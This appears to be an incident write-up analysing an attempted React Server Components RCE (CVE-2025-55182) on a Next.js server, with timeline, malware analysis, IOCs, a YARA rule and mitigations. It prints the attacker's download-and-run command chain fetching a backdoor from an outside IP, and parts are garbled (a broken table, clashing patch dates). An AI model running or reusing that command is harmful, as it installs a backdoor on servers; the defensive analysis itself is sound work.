Share
## https://sploitus.com/exploit?id=9522054D-77D4-5B2D-BF07-F6FC62F206BE
# CVE-2025-55182 Attack Analysis: React Server Components RCE
> **Real-world attack analysis on a production Next.js application**
## ๐ Table of Contents
- [Executive Summary](#executive-summary)
- [Vulnerability Overview](#vulnerability-overview)
- [Attack Timeline](#attack-timeline)
- [Technical Analysis](#technical-analysis)
- [Malware Analysis](#malware-analysis)
- [Indicators of Compromise (IOCs)](#indicators-of-compromise-iocs)
- [Mitigation & Response](#mitigation--response)
- [Lessons Learned](#lessons-learned)
- [References](#references)
---
## Executive Summary
On **December 5, 2025**, our production Next.js application was targeted by attackers exploiting **CVE-2025-55182** (React2Shell), a critical Remote Code Execution vulnerability in React Server Components. The attack attempted to download and execute a Linux backdoor trojan on our server.
| Attribute | Value |
|-----------|-------|
| **CVE ID** | CVE-2025-55182 |
| **CVSS Score** | 9.8 (Critical) |
| **Attack Date** | December 5, 2025 |
| **Attack Outcome** | โ
Blocked (post-patch) |
| **Malware Type** | Linux Backdoor Trojan |
| **Affected Stack** | Next.js + React Server Components |
---
## Vulnerability Overview
### What is CVE-2025-55182?
CVE-2025-55182, also known as **"React2Shell"**, is a critical Remote Code Execution (RCE) vulnerability affecting React Server Components (RSC) in:
- **React**: versions 19.0.0 - 19.1.0
- **Next.js**: versions 15.x and 16.x (before patches)
### Root Cause
The vulnerability exists in the `renderToReadableStream()` function within React's Flight Server. When processing specially crafted RSC payloads, the server fails to properly sanitize certain input, leading to arbitrary code execution.
### Attack Vector
```
Attacker โ Malicious RSC Payload โ Flight Server โ eval() โ RCE
```
The attacker sends a crafted POST request with a malicious serialized payload that gets deserialized and executed on the server.
---
## Attack Timeline
### Phase 1: Initial Exploitation Attempts (Pre-Patch)
| Timestamp (UTC) | Event |
|-----------------|-------|
| Dec 5, 06:20 | First attack detected via Sentry |
| Dec 5, 06:20 | Payload attempts to execute shell commands |
| Dec 5, 06:20 | Attack partially successful (pre-patch) |
**Sentry Error Log (Pre-Patch):**
```
Error: root
at eval (eval at , :3:6)
at nk (chunk.js)
at JSON.parse ()
at n5 (/app/node_modules/next/dist/server/app-render.js)
```
### Phase 2: Patch Deployment
| Timestamp | Action |
|-----------|--------|
| Dec 4, 14:13 | Upgraded to Next.js 16.0.7 |
| Dec 4, 14:13 | Deployed patched version (v1.0.0-beta-4) |
### Phase 3: Post-Patch Attack Blocked
| Timestamp (UTC) | Event |
|-----------------|-------|
| Dec 5, 08:48 | Attack attempt detected |
| Dec 5, 08:48 | **Payload execution BLOCKED** |
| Dec 5, 08:48 | Error: `syntax error: unexpected ";"` |
**Sentry Error Log (Post-Patch):**
```
Error: Command failed: wget http://45.76.155.14/vim -O /tmp/vim ;
chmod +x /tmp/vim ; nohup /tmp/vim > /dev/null 2>&1 & ; rm -f /tmp/vim
/bin/sh: syntax error: unexpected ";"
```
The patch successfully prevented the malicious command from executing.
---
## Technical Analysis
### Attack Request Details
| Attribute | Value |
|-----------|-------|
| **Target URL** | `https://[REDACTED]/` |
| **Method** | POST |
| **User-Agent** | `Python Requests 2.31` |
| **Origin** | Automated attack script |
### Payload Analysis
The attacker attempted to execute the following command chain:
```bash
wget http://45.76.155.14/vim -O /tmp/vim ; \
chmod +x /tmp/vim ; \
nohup /tmp/vim > /dev/null 2>&1 & ; \
rm -f /tmp/vim
```
**Breakdown:**
| Step | Command | Purpose |
|------|---------|---------|
| 1 | `wget http://45.76.155.14/vim -O /tmp/vim` | Download malware |
| 2 | `chmod +x /tmp/vim` | Make executable |
| 3 | `nohup /tmp/vim > /dev/null 2>&1 &` | Run in background, persist after logout |
| 4 | `rm -f /tmp/vim` | Delete evidence |
### Server Environment
| Component | Version |
|-----------|---------|
| **OS** | Alpine Linux 3.23.0 |
| **Runtime** | Node.js v20.19.6 |
| **Framework** | Next.js 16.0.7 (patched) |
| **Container** | Docker |
---
## Malware Analysis
### File Information
| Attribute | Value |
|-----------|-------|
| **Filename** | `vim` (disguised as legitimate tool) |
| **SHA256** | `0f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce` |
| **File Type** | ELF 64-bit LSB executable, x86-64 |
| **Language** | Go (compiled binary) |
| **File Size** | ~4.7 MB |
### VirusTotal Results
**Detection Rate:** 13/72 (18%)
| Vendor | Detection Name |
|--------|----------------|
| DrWeb | `Linux.BackDoor.Siggen.389` |
| AhnLab-V3 | `Backdoor/Linux.Agent.4780032` |
| Kaspersky | `HEUR:Trojan.Linux.Agent.gen` |
| ESET-NOD32 | `Linux/Agent.PX Trojan` |
| Avast/AVG | `ELF:Agent-BQE [Trj]` |
| AliCloud | `Trojan:Linux/Agent.ff565f70` |
| Antiy-AVL | `Trojan/Linux.Agent.px` |
| Rising | `Trojan.Agent/Linux!8.13268` |
| SentinelOne | `Static AI - Suspicious ELF` |
| Tencent | `Malware.Linux.Generic.1c03c8b9` |
| Zillya | `Trojan.Agent.Linux.5292` |
**VirusTotal Link:** [View Analysis](https://www.virustotal.com/gui/file/0f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce)
### Binary Analysis
**ELF Header:**
```
00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000 .ELF............
00000010: 0200 3e00 0100 0000 60e7 4500 0000 0000 ..>.....`.E.....
```
**Identified Capabilities:**
| Capability | Evidence |
|------------|----------|
| HTTP/HTTPS Client | `net/http`, `*http.Client` |
| TLS Encryption | `crypto/tls`, `crypto/aes` |
| SOCKS5 Proxy | `socks`, `socks5` |
| DNS Resolution | `net/dns/dnsmessage` |
| Strong Crypto | `chacha20poly1305`, `Ed25519` |
**Extracted Strings (Relevant):**
```
crypto/aes
crypto/tls
net/http
socks5
vendor/golang.org/x/crypto/chacha20poly1305
vendor/golang.org/x/net/http2/hpack
```
### IDS Rules Triggered
| Severity | Rule | Source |
|----------|------|--------|
| LOW | `ET POLICY HTTP traffic on port 443 (POST)` | Proofpoint ET Open |
| LOW | `ET DNS Query for .cc TLD` | Proofpoint ET Open |
### Malware Classification
**Type:** Linux Backdoor Trojan
**Capabilities:**
- Remote shell access
- Command & Control (C2) communication
- File upload/download
- Encrypted communications
- Traffic tunneling via SOCKS5
- Persistence mechanisms
---
## Indicators of Compromise (IOCs)
### Network IOCs
| Type | Value | Description |
|------|-------|-------------|
| **IP Address** | `45.76.155.14` | Malware distribution server |
| **URL** | `http://45.76.155.14/vim` | Malware download URL |
| **Hosting** | Vultr VPS | Cloud provider |
| **TLD** | `.cc` | C2 domain uses .cc TLD |
### File IOCs
| Type | Value |
|------|-------|
| **SHA256** | `0f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce` |
| **SHA1** | `[Calculate if needed]` |
| **MD5** | `[Calculate if needed]` |
| **Filename** | `vim` (disguised) |
| **File Type** | ELF 64-bit x86-64 |
| **File Size** | ~4.7 MB |
### Behavioral IOCs
| Indicator | Description |
|-----------|-------------|
| `wget` to external IP | Downloads from non-standard URLs |
| Files in `/tmp/` | Suspicious executable in temp directory |
| `nohup` + background execution | Persistence attempt |
| Immediate file deletion | Evidence cleanup |
| Python Requests User-Agent | Automated attack tool |
### YARA Rule
```yara
rule CVE_2025_55182_Backdoor {
meta:
description = "Detects backdoor distributed via CVE-2025-55182"
author = "Security Researcher"
date = "2025-12-05"
hash = "0f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce"
strings:
$elf = { 7F 45 4C 46 }
$go1 = "vendor/golang.org/x/crypto" ascii
$go2 = "vendor/golang.org/x/net" ascii
$net1 = "net/http" ascii
$net2 = "socks5" ascii
$crypto1 = "crypto/tls" ascii
$crypto2 = "chacha20poly1305" ascii
condition:
$elf at 0 and
(2 of ($go*)) and
(1 of ($net*)) and
(1 of ($crypto*))
}
```
---
## Mitigation & Response
### Immediate Actions Taken
| Action | Status | Details |
|--------|--------|---------|
| โ
Upgrade Next.js | Complete | 16.0.4 โ 16.0.7 |
| โ
Upgrade React | Complete | 19.1.0 โ 19.1.0 (patched) |
| โ
Redeploy application | Complete | Docker rebuild |
| โ
Analyze malware | Complete | VirusTotal submission |
| โ
Report to hosting | Complete | Vultr abuse report sent |
| โณ Rotate credentials | Pending | Database, JWT, API keys |
### Abuse Report
An abuse report was submitted to Vultr (the hosting provider of the C2 server) on **December 5, 2025** containing:
- Malicious IP address and URL
- SHA256 hash of malware
- VirusTotal analysis link
- Description of attack vector (CVE-2025-55182)
### Patched Versions
| Package | Vulnerable | Patched |
|---------|------------|---------|
| Next.js | /dev/null
# Check for suspicious processes
ps aux | grep -E "(vim|/tmp/)"
# Check network connections
netstat -an | grep "45.76.155.14"
```
**4. Rotate all secrets:**
- Database credentials
- JWT secrets
- API keys
- Session secrets
---
## Lessons Learned
### What Went Well
1. **Sentry monitoring** caught the attack immediately
2. **Quick patch deployment** within hours of CVE disclosure
3. **Docker containerization** limited blast radius
4. **Post-patch protection** successfully blocked subsequent attacks
### What Could Be Improved
1. **Faster patching** - Reduce time between CVE disclosure and patch
2. **WAF rules** - Add rules to detect RSC exploitation attempts
3. **Egress filtering** - Block outbound connections to unknown IPs
4. **Automated alerts** - Set up alerts for suspicious shell commands
### Security Recommendations
| Category | Recommendation |
|----------|----------------|
| **Monitoring** | Implement real-time error monitoring (Sentry, etc.) |
| **Updates** | Subscribe to security advisories for all dependencies |
| **Network** | Implement egress filtering, block unnecessary outbound |
| **Containers** | Run as non-root, use read-only filesystems |
| **Secrets** | Rotate credentials regularly, use secrets manager |
---
## References
### Official Advisories
- [Next.js Security Advisory](https://github.com/vercel/next.js/security/advisories)
- [React Security Updates](https://react.dev/blog)
- [CVE-2025-55182 Details](https://nvd.nist.gov/vuln/detail/CVE-2025-55182)
### Analysis Resources
- [VirusTotal Analysis](https://www.virustotal.com/gui/file/0f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce)
- [MalwareBazaar](https://bazaar.abuse.ch/)
### Tools Used
- [Sentry](https://sentry.io/) - Error monitoring
- [VirusTotal](https://www.virustotal.com/) - Malware analysis
- [Docker](https://www.docker.com/) - Containerization
---
## Disclaimer
This write-up is published for **educational and defensive purposes only**. The malware binary is not included in this repository. Security researchers can obtain the sample via VirusTotal using the SHA256 hash provided.
---
## Author
**Published:** December 5, 2025
**Contact:** [Your contact info or GitHub profile]
---
## License
This analysis is released under [CC BY 4.0](https://creativecommons.org/licenses/by/4.0/). You are free to share and adapt this material with appropriate attribution.
---
## Changelog
| Date | Version | Changes |
|------|---------|---------|
| 2025-12-05 | 1.0 | Initial publication |